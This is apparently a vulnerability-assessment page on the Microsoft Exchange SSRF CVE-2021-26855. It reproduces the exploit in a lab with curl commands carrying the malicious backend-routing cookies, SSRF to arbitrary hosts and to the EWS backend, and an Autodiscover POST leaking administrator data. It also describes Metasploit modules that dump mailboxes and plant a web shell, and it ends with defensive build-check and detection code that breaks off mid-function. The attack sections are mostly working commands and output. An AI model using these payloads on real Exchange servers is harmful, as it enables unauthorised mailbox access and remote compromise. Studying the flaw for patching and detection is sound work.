CVE-2021-26855
Attacker Value: Very High (2 users assessed)
Exploitability: High (2 users assessed)
Description
Microsoft Exchange Server Remote Code Execution Vulnerability
Ratings
- Attacker Value: Very High
- Exploitability: High
Technical Analysis
CVE-2021-26855
CVE-2021-26855 is an SSRF vulnerability in Exchange that allows privileged access to Exchange’s backend resources, ultimately leading to pre-auth RCE when combined with CVEs such as CVE-2021-27065.
Microsoft’s (Nmap) NSE script
Conveniently disclosed in Microsoft’s alternative mitigations, this script provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.
wvu@kharak:~/Downloads$ ls
http-vuln-cve2021-26855.nse
wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Initiating Connect Scan at 00:50
Scanning 192.168.123.183 [1 port]
Discovered open port 443/tcp on 192.168.123.183
Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.123.183.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.02s elapsed
Nmap scan report for 192.168.123.183
Host is up (0.00064s latency).

PORT    STATE SERVICE
443/tcp open  https
| http-vuln-cve2021-26855:
|   VULNERABLE:
|   Exchange Server SSRF Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2021-26855
|       Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.
|
|     Disclosure date: 2021-03-02
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
|_      http://aka.ms/exchangevulns

NSE: Script Post-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
wvu@kharak:~/Downloads$
Ported to curl(1)…
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" https://192.168.123.183/owa/auth/x.js
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar 8 22:45:17 2021 GMT
*  expire date: Mar 8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f8cb580b400)
> GET /owa/auth/x.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 500
< cache-control: private
< content-type: text/html; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02
< x-calculatedbetarget: localhost
< x-calculatedbetarget: localhost
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 06:52:07 GMT
< content-length: 85
<
* Connection #0 to host 192.168.123.183 left intact
NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0
wvu@kharak:~$
SSRF to an arbitrary remote host
You can specify an arbitrary host in X-AnonResource-Backend.
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar 8 22:45:17 2021 GMT
*  expire date: Mar 8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9ea080d600)
> GET /owa/auth/22702.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
Catching the request in ncat(1)…
wvu@kharak:~$ ncat -lkv --ssl 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.123.183.
Ncat: Connection from 192.168.123.183:6303.
GET /owa/auth/22702.js HTTP/1.1
X-FE-ClientIP: 192.168.123.1
X-Forwarded-For: 192.168.123.1
X-Forwarded-Port: 55723
X-MS-EdgeIP:
X-ExCompId: ClientAccessFrontEnd
Accept: */*
User-Agent: curl/7.64.1
X-OriginalRequestHost: 192.168.123.183
X-OriginalRequestHostSchemePort: 443:https:192.168.123.183
X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=
msExchProxyUri: https://192.168.123.183/owa/auth/22702.js
X-IsFromCafe: 1
X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL
X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA
X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e
Host: 192.168.123.1
Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
Connection: Keep-Alive
The fun folks working on the Nuclei scanner noticed burpcollaborator.net made a good target for their scanner.
wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar 8 22:45:17 2021 GMT
*  expire date: Mar 8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fd58480f600)
> GET /owa/auth/18409.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html
< server: Microsoft-IIS/10.0
< request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8
< x-calculatedbetarget: burpcollaborator.net
< x-collaborator-version: 4
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 07:58:52 GMT
< content-length: 1190
<
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<h1>Burp Collaborator Server</h1>
<p>Burp Collaborator is a service that is used by <a href="https://portswigger.net/burp/">Burp Suite</a> when testing web applications for security vulnerabilities. Some of Burp Suite's tests may cause the application being tested to interact with the Burp Collaborator server, to enable Burp Suite to detect various security vulnerabilities.
</p><p>The Burp Collaborator server does not itself initiate any interactions with any system, and only responds to interactions that it receives from other systems.
</p><p>If you are a systems administrator and you are seeing interactions with the Burp Collaborator server in your logs, then it is likely that someone is testing your web application using Burp Suite. If you are trying to identify the person responsible for this testing, you should review your web server or applications logs for the time at which these interactions were initiated by your systems.
</p><p>For further details about Burp Collaborator, please see the <a href="https://portswigger.net/burp/documentation/collaborator/">full documentation</a>.</p></body>
* Connection #0 to host 192.168.123.183 left intact
</html>* Closing connection 0
wvu@kharak:~$
SSRF to a privileged backend resource
Hostname WIN-T4RO9496TA7 is from the x-feserver header.
wvu@kharak:~$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM" "https://192.168.123.183/ecp/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar 8 22:45:17 2021 GMT
*  expire date: Mar 8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7faac2808200)
> GET /ecp/1849.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html; charset=UTF-8
< server: Microsoft-IIS/10.0
< request-id: b4762a11-d418-43f8-a435-f04420289a4c
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Tue, 09 Mar 2021 07:00:11 GMT
< content-length: 2836
<
<HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD>
<BODY><DIV id="content" role="main"><h1 class="heading1">Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P>
<h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test </font>{ <font color="blue"> static void </font>Main() { <font color="black">HelloClient</font> client = <font color="blue">new </font><font color="black">HelloClient</font>(); <font color="darkgreen"> // Use the 'client' variable to call operations on the service. </font><font color="darkgreen"> // Always close the client. </font> client.Close(); } } </PRE><BR/>
<h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test </font><font color="blue"> Shared Sub </font>Main() <font color="blue"> Dim </font>client As <font color="black">HelloClient</font> = <font color="blue">New </font><font color="black">HelloClient</font>() <font color="darkgreen"> ' Use the 'client' variable to call operations on the service. </font><font color="darkgreen"> ' Always close the client. </font> client.Close() <font color="blue"> End Sub
* Connection #0 to host 192.168.123.183 left intact
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0
wvu@kharak:~$
POSTing to the EWS endpoint (not shown) allows an attacker access to a target’s mailbox. A sample Autodiscover request is shown below.
wvu@kharak:~/Downloads$ cat poc.xml
<?xml version="1.0"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@gibson.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>
wvu@kharak:~/Downloads$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM" -H "Content-Type: text/xml" "https://192.168.123.207/ecp/$RANDOM.js" -d @poc.xml
*   Trying 192.168.123.207...
* TCP_NODELAY set
* Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar 8 22:45:17 2021 GMT
*  expire date: Mar 8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fa592808200)
> POST /ecp/3425.js HTTP/2
> Host: 192.168.123.207
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753
> Content-Type: text/xml
> Content-Length: 354
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
* We are completely uploaded and fine
< HTTP/2 200
< cache-control: private
< content-type: text/xml; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Wed, 10 Mar 2021 01:26:19 GMT
< content-length: 3866
<
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>
      <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>
        <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>
        <ServerVersion>73C18880</ServerVersion>
        <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>
        <AD>WIN-T4RO9496TA7.gibson.local</AD>
        <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>win-t4ro9496ta7.gibson.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
* Connection #0 to host 192.168.123.207 left intact
</Autodiscover>* Closing connection 0
wvu@kharak:~/Downloads$
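An offline build-number check that encodes the five fixed builds printed by the NSE script in the nmap output above. This is an added example, not part of the assessment or of Microsoft's script; the inventory text and server names in it are constructed, and builds on a cumulative update the script does not list are reported as unknown rather than guessed.

```python
"""Check Exchange build numbers against the fixed builds the NSE script reports."""
import re
from typing import Dict, Optional, Tuple

# (major, minor, build) -> (product label as printed by the script, first fixed revision).
# Thresholds copied from the nmap output: anything below the revision is vulnerable.
FIXED_REVISIONS: Dict[Tuple[int, int, int], Tuple[str, int]] = {
    (15, 0, 1497): ("Exchange 2013", 12),       # < 15.00.1497.012
    (15, 1, 2106): ("Exchange 2016 CU18", 13),  # < 15.01.2106.013
    (15, 1, 2176): ("Exchange 2016 CU19", 9),   # < 15.01.2176.009
    (15, 2, 721): ("Exchange 2019 CU7", 13),    # < 15.02.0721.013
    (15, 2, 792): ("Exchange 2019 CU8", 10),    # < 15.02.0792.010
}

# Matches "15.01.2176.009", "15.1.2176.9" and "Version 15.1 (Build 2176.9)".
_BUILD_RE = re.compile(r"(\d+)\.(\d+)\D+(\d+)\.(\d+)")


def parse_build(text: str) -> Tuple[int, int, int, int]:
    """Extract (major, minor, build, revision); leading zeros are not significant."""
    m = _BUILD_RE.search(text)
    if m is None:
        raise ValueError(f"no Exchange build number in {text!r}")
    major, minor, build, revision = (int(g) for g in m.groups())
    return major, minor, build, revision


def assess_build(text: str) -> Tuple[str, Optional[str]]:
    """Return ("vulnerable" | "patched" | "unknown", product label or None)."""
    major, minor, build, revision = parse_build(text)
    entry = FIXED_REVISIONS.get((major, minor, build))
    if entry is None:
        return "unknown", None  # CU not covered by the script's table
    label, fixed = entry
    return ("patched" if revision >= fixed else "vulnerable"), label


def triage_inventory(text: str) -> Dict[str, str]:
    """Map server name -> status for 'Name  AdminDisplayVersion' style output.

    Lines without a build number (headers, blanks) are skipped.
    """
    result: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name = line.split()[0]
        try:
            status, _label = assess_build(line)
        except ValueError:
            continue
        result[name] = status
    return result


# Constructed inventory in the shape of Get-ExchangeServer output; names are made up.
SAMPLE_INVENTORY = """\
Name   AdminDisplayVersion
EX01   Version 15.1 (Build 2176.9)
EX02   Version 15.1 (Build 2106.6)
EX03   Version 15.2 (Build 721.13)
OLDEX  Version 15.1 (Build 1979.3)
"""

if __name__ == "__main__":
    for server, status in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{server}: {status}")
```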
Ratings
- Attacker Value: Very High
- Exploitability: High
Technical Analysis
Three modules exploiting this vulnerability have been added to Metasploit:
- A scanner module that checks if the target is vulnerable to this Server-Side Request Forgery.
- An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information.
- An exploit module that leverages an unauthenticated Remote Code Execution. This allows execution of arbitrary commands as the SYSTEM user. This module takes advantage of the same SSRF vulnerability and also of a post-auth arbitrary-file-write vulnerability identified as CVE-2021-27065.
The auxiliary module (2) leverages this SSRF to retrieve the internal Exchange server name and query the Autodiscover service to retrieve other internal data. All of this is done without authentication through the Exchange Admin Center (EAC), usually located at https://<ServerFQDN>/ecp, so it needs to be accessible. It finally POSTs to the EWS endpoint to dump emails, contacts, etc. Note that this exploit needs at least two Exchange servers to work. One is the host the module directly sends requests to and the other server is the internal resource the SSRF targets.
The exploit module (3) follows the same workflow but retrieves extra information such as the user SID, session ID, canary value, etc. Then, still using the SSRF, the module exploits the arbitrary-file-write vulnerability (CVE-2021-27065) to create a custom .aspx web page that embeds a web shell. Finally, once this backdoor is planted, it uses it to stage the actual payload and execute it. Note that, for this exploit to work, the email address used needs to be the email address of an Administrator on the Exchange server. It is not really something difficult to obtain, as long as you know the name of an admin and the email pattern used internally.
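Request triage for the pattern both assessments describe: an X-AnonResource-Backend or X-BEResource cookie carrying a backend target with a "~<number>" suffix on a /owa/auth/*.js or /ecp/*.js path. This is an added defensive example, not code from either assessment or from the Metasploit modules; the sample requests are constructed from the ncat capture and curl sessions above, and the `own_servers` set is an assumed inventory of the organisation's Exchange hostnames.

```python
"""Flag HTTP requests that carry the CVE-2021-26855 front-end proxy cookies."""
import re
from typing import Dict, List, Set, Tuple

# Cookies the vulnerable Client Access front end uses to pick a backend target.
PROXY_COOKIES = ("X-AnonResource-Backend", "X-BEResource")
# Static-resource paths used in the requests on this page.
STATIC_PATH = re.compile(r"^/(owa/auth|ecp)/[^/?]+\.js$", re.IGNORECASE)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Return (method, path, cookies) from raw HTTP/1.x request text."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(maxsplit=2)
    path = target.split("?", 1)[0]
    cookies: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            for item in value.split(";"):
                key, _, val = item.strip().partition("=")
                if key:
                    cookies[key] = val
    return method, path, cookies


def backend_host(cookie_value: str) -> str:
    """'WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406' -> 'win-t4ro9496ta7'."""
    return re.split(r"[/~?]", cookie_value, maxsplit=1)[0].lower()


def triage(raw: str, own_servers: Set[str]) -> List[str]:
    """List the reasons a request looks like a ProxyLogon SSRF attempt (empty if none)."""
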